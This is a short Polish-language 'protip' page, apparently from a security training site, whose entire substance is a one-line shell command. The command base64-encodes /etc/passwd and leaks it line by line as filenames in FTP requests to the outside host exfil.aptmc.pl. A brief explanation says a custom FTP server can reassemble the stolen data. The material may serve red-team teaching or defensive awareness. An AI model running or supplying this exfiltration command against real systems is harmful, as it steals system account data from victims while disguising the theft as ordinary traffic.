alphasec academy

for a in $(cat /etc/passwd|openssl base64); do curl -s ftp://exfil.aptmc.pl/test_$a -O /dev/null; done - eksfiltruj dane pod płaszczem zapytań FTP

Dodatkowe informacje

Najpierw zamieniamy linijka po linijce pliku /etc/passwd na base64, a nastepnie próbujemy pobrać plik o nazwie test_<base64> z anonimowego serwera FTP. Wykorzystując własną implementację serwera FTP (np. za pomocą aptm.in/protip/0038), jesteśmy w stanie łatwo skleić eksfiltrowane dane w jedną całość.

Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.